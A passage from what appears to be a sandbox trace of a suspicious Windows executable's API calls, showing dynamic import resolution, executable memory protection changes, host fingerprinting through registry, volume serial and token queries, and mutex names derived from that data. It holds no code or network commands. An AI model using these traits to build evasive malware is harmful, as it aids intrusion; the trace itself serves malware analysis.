returned 0x76370000 [0328.050] SetErrorMode (uMode=0x0) returned 0x8001 [0328.050] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0328.050] SetErrorMode (uMode=0x8001) returned 0x0 [0328.050] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.050] SetErrorMode (uMode=0x0) returned 0x8001 [0328.050] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0328.050] SetErrorMode (uMode=0x8001) returned 0x0 [0328.050] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.050] SetErrorMode (uMode=0x0) returned 0x8001 [0328.050] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0328.050] SetErrorMode (uMode=0x8001) returned 0x0 [0328.050] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.050] SetErrorMode (uMode=0x0) returned 0x8001 [0328.050] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0328.050] SetErrorMode (uMode=0x8001) returned 0x0 [0328.050] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0328.051] SetErrorMode (uMode=0x0) returned 0x8001 [0328.051] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0328.051] SetErrorMode (uMode=0x8001) returned 0x0 [0328.051] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.051] SetErrorMode (uMode=0x0) returned 0x8001 [0328.051] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0328.051] SetErrorMode (uMode=0x8001) returned 0x0 [0328.051] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.051] SetErrorMode (uMode=0x0) returned 0x8001 [0328.051] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0328.052] SetErrorMode (uMode=0x8001) returned 0x0 [0328.052] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.052] SetErrorMode (uMode=0x0) returned 0x8001 [0328.052] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0328.052] SetErrorMode (uMode=0x8001) returned 0x0 [0328.052] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.052] SetErrorMode (uMode=0x0) returned 0x8001 [0328.052] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0328.052] SetErrorMode (uMode=0x8001) returned 0x0 [0328.052] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.052] SetErrorMode (uMode=0x0) returned 0x8001 [0328.052] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0328.052] SetErrorMode (uMode=0x8001) returned 0x0 [0328.052] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0328.052] SetErrorMode (uMode=0x0) returned 0x8001 [0328.052] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0328.052] SetErrorMode (uMode=0x8001) returned 0x0 [0328.052] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.053] SetErrorMode (uMode=0x0) returned 0x8001 [0328.053] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0328.053] SetErrorMode (uMode=0x8001) returned 0x0 [0328.053] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.053] SetErrorMode (uMode=0x0) returned 0x8001 [0328.053] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0328.053] SetErrorMode (uMode=0x8001) returned 0x0 [0328.053] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.053] SetErrorMode (uMode=0x0) returned 0x8001 [0328.053] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0328.053] SetErrorMode (uMode=0x8001) returned 0x0 [0328.053] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.053] SetErrorMode (uMode=0x0) returned 0x8001 [0328.053] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0328.053] SetErrorMode (uMode=0x8001) returned 0x0 [0328.053] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.053] SetErrorMode (uMode=0x0) returned 0x8001 [0328.054] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0328.054] SetErrorMode (uMode=0x8001) returned 0x0 [0328.054] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.054] SetErrorMode (uMode=0x0) returned 0x8001 [0328.054] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0328.054] SetErrorMode (uMode=0x8001) returned 0x0 [0328.054] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.054] SetErrorMode (uMode=0x0) returned 0x8001 [0328.054] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0328.054] SetErrorMode (uMode=0x8001) returned 0x0 [0328.054] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0328.054] SetErrorMode (uMode=0x0) returned 0x8001 [0328.054] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0328.054] SetErrorMode (uMode=0x8001) returned 0x0 [0328.054] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.057] SetErrorMode (uMode=0x0) returned 0x8001 [0328.057] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0328.057] SetErrorMode (uMode=0x8001) returned 0x0 [0328.057] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.057] SetErrorMode (uMode=0x0) returned 0x8001 [0328.057] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0328.057] SetErrorMode (uMode=0x8001) returned 0x0 [0328.057] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.057] SetErrorMode (uMode=0x0) returned 0x8001 [0328.057] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0328.057] SetErrorMode (uMode=0x8001) returned 0x0 [0328.057] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.057] SetErrorMode (uMode=0x0) returned 0x8001 [0328.057] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0328.058] SetErrorMode (uMode=0x8001) returned 0x0 [0328.058] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.058] SetErrorMode (uMode=0x0) returned 0x8001 [0328.058] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0328.058] SetErrorMode (uMode=0x8001) returned 0x0 [0328.058] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.058] SetErrorMode (uMode=0x0) returned 0x8001 [0328.058] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0328.058] SetErrorMode (uMode=0x8001) returned 0x0 [0328.058] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.058] SetErrorMode (uMode=0x0) returned 0x8001 [0328.058] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0328.058] SetErrorMode (uMode=0x8001) returned 0x0 [0328.058] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.058] SetErrorMode (uMode=0x0) returned 0x8001 [0328.058] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0328.058] SetErrorMode (uMode=0x8001) returned 0x0 [0328.058] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.059] SetErrorMode (uMode=0x0) returned 0x8001 [0328.059] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0328.059] SetErrorMode (uMode=0x8001) returned 0x0 [0328.059] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0328.059] SetErrorMode (uMode=0x0) returned 0x8001 [0328.059] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0328.059] SetErrorMode (uMode=0x8001) returned 0x0 [0328.059] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0328.059] SetErrorMode (uMode=0x0) returned 0x8001 [0328.059] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0328.059] SetErrorMode (uMode=0x8001) returned 0x0 [0328.059] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0328.059] SetErrorMode (uMode=0x0) returned 0x8001 [0328.059] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0328.059] SetErrorMode (uMode=0x8001) returned 0x0 [0328.059] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0328.060] SetErrorMode (uMode=0x0) returned 0x8001 [0328.060] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0328.060] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x2) returned 1 [0328.062] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0xf20f, flNewProtect=0x20, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x40) returned 1 [0328.062] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x411000, dwSize=0x2bfe, flNewProtect=0x4, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x40) returned 1 [0328.062] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x414000, dwSize=0x696c, flNewProtect=0x4, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x40) returned 1 [0328.062] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x41b000, dwSize=0xc08, flNewProtect=0x4, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x40) returned 1 [0328.062] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x3630c00 | out: lpflOldProtect=0x3630c00*=0x40) returned 1 [0328.063] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0328.063] GetCurrentProcessId () returned 0x594 [0328.063] CryptAcquireContextW (in: phProv=0x417e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x417e5c*=0x524fb8) returned 1 [0328.073] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4084e9) returned 0x51d158 [0328.073] GetComputerNameW (in: lpBuffer=0x18fcc8, nSize=0x18fcac | out: lpBuffer="YKYD69Q", nSize=0x18fcac) returned 1 [0328.073] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc80 | out: phkResult=0x18fc80*=0x134) returned 0x0 [0328.073] RegQueryValueExW (in: hKey=0x134, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18fcb4, lpData=0x18fcb0, lpcbData=0x18fc7c*=0x4 | out: lpType=0x18fcb4*=0x4, lpData=0x18fcb0*=0x0, lpcbData=0x18fc7c*=0x4) returned 0x0 [0328.073] RegCloseKey (hKey=0x134) returned 0x0 [0328.073] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0x134) returned 0x0 [0328.073] RegQueryValueExW (in: hKey=0x134, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0) returned 0x2 [0328.073] RegCloseKey (hKey=0x134) returned 0x0 [0328.073] GetVersionExW (in: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0328.073] GlobalMemoryStatusEx (in: lpBuffer=0x18fe60 | out: lpBuffer=0x18fe60) returned 1 [0328.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fe38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fe38*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0328.074] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff68 | out: Wow64Process=0x18ff68) returned 1 [0328.074] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4177f0, dwRevision=0x1 | out: pSecurityDescriptor=0x4177f0) returned 1 [0328.074] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4177f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0328.074] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0328.074] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x51c188, lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4 | out: lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4) returned 1 [0328.074] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4177f0, bSaclPresent=1, pSacl=0x51c19c, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0328.074] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18f220 | out: pszPath="C:\\Windows") returned 0x0 [0328.076] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0328.076] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0328.076] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0328.076] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0328.076] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0328.076] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0328.076] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x417a28 | out: pclsid=0x417a28*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0328.076] GetVersionExW (in: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x51f038, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0328.076] GetVersionExW (in: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x18f478, dwMinorVersion=0x407dfd, dwBuildNumber=0x6, dwPlatformId=0x0, szCSDVersion="Ĝ") | out: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0328.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18f4ec | out: TokenHandle=0x18f4ec*=0x13c) returned 1 [0328.076] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4e8 | out: TokenInformation=0x0, ReturnLength=0x18f4e8) returned 0 [0328.077] GetLastError () returned 0x7a [0328.077] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x27df9b0, TokenInformationLength=0x14, ReturnLength=0x18f4e8 | out: TokenInformation=0x27df9b0, ReturnLength=0x18f4e8) returned 1 [0328.077] GetSidSubAuthorityCount (pSid=0x27df9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x27df9b9 [0328.077] GetSidSubAuthority (pSid=0x27df9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x27df9c0 [0328.077] CloseHandle (hObject=0x13c) returned 1 [0328.077] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0328.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18ff64 | out: TokenHandle=0x18ff64*=0x140) returned 1 [0328.077] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff4c | out: TokenInformation=0x0, ReturnLength=0x18ff4c) returned 0 [0328.077] GetLastError () returned 0x7a [0328.077] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x27df9b0, TokenInformationLength=0x24, ReturnLength=0x18ff4c | out: TokenInformation=0x27df9b0, ReturnLength=0x18ff4c) returned 1 [0328.077] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0xc, TokenInformation=0x4177e0, TokenInformationLength=0x4, ReturnLength=0x18ff60 | out: TokenInformation=0x4177e0, ReturnLength=0x18ff60) returned 1 [0328.077] CloseHandle (hObject=0x140) returned 1 [0328.077] GetLengthSid (pSid=0x27df9b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0328.077] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x417810 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0328.078] PathRemoveBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned="g" [0328.078] GetCurrentProcess () returned 0xffffffff [0328.078] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18fd64, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x34 [0328.078] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0328.078] GetProcAddress (hModule=0x77cb0000, lpProcName="RtlDosPathNameToNtPathName_U") returned 0x77d0ce41 [0328.078] GetProcAddress (hModule=0x77cb0000, lpProcName="NtCreateFile") returned 0x77cd00a4 [0328.078] GetProcAddress (hModule=0x77cb0000, lpProcName="NtClose") returned 0x77ccf9d0 [0328.078] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQueryEaFile") returned 0x77cd1314 [0328.079] GetProcAddress (hModule=0x77cb0000, lpProcName="NtSetEaFile") returned 0x77cd19b0 [0328.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", NtPathName=0x18f880, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0328.079] NtCreateFile (in: FileHandle=0x18f874, DesiredAccess=0x8, ObjectAttributes=0x18f888*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f878, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f874*=0x14c, IoStatusBlock=0x18f878*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0328.079] NtQueryEaFile (in: FileHandle=0x14c, IoStatusBlock=0x18f878, Buffer=0x27dfa90, Length=0x409, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x18f878, Buffer=0x27dfa90) returned 0xc0000052 [0328.079] NtClose (Handle=0x14c) returned 0x0 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="9B") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="4D") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="68") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="96") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="17") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="31") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="FE") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="3C") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="22") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="DA") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="08") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="B6") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="40") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="79") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="9E") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f5f0, cchDest=3, pszFmt="%02X", arglist=0x18f5cc | out: pszDest="B6") returned 2 [0328.079] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=0, lpName="9B4D68961731FE3C22DA08B640799EB6") returned 0x14c [0328.079] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0328.079] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E5") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="8E") returned 2 [0328.079] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FF") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="54") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A4") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="36") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E9") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="82") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FC") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FA") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="1C") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="04") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="45") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A2") returned 2 [0328.080] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x148 [0328.080] CloseHandle (hObject=0x148) returned 1 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="D3") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="B6") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="C4") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="DE") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="8C") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="F7") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="9A") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="85") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="4B") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="54") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="9E") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="E2") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="32") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="F0") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="8C") returned 2 [0328.080] wvnsprintfW (in: 